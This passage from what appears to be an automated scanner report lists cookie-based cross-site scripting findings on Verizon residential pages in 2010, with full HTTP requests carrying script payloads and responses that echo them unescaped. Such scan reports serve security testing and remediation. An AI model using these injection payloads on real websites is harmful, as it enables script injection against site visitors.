HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79336
Expires: Sat, 20 Nov 2010 02:56:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX7319b'><script>alert(1)</script>b412aee3463; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7319B'><SCRIPT>ALERT(1)</SCRIPT>B412AEE3463 ' />
...[SNIP]...

1.181. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 226d7"-alert(1)-"1d917d73025 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=226d7"-alert(1)-"1d917d73025; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 85594
Expires: Sat, 20 Nov 2010 02:56:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "226d7"-alert(1)-"1d917d73025"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: docu
...[SNIP]...

1.182. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af320'><script>alert(1)</script>638530528ed was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXaf320'><script>alert(1)</script>638530528ed; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77956
Expires: Sat, 20 Nov 2010 02:56:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=TXaf320'><script>alert(1)</script>638530528ed; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAF320'><SCRIPT>ALERT(1)</SCRIPT>638530528ED ' />
...[SNIP]...

1.183. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 6357f<script>alert(1)</script>71117283bfe was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX6357f<script>alert(1)</script>71117283bfe; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77952
Expires: Sat, 20 Nov 2010 02:56:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/
Set-Cookie: ContextInfo_State=TX6357f<script>alert(1)</script>71117283bfe; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6357F<SCRIPT>ALERT(1)</SCRIPT>71117283BFE </DIV>
...[SNIP]...

1.184. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99a3b"-alert(1)-"75f87706d4 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=99a3b"-alert(1)-"75f87706d4; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84230
Expires: Sat, 20 Nov 2010 02:56:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/

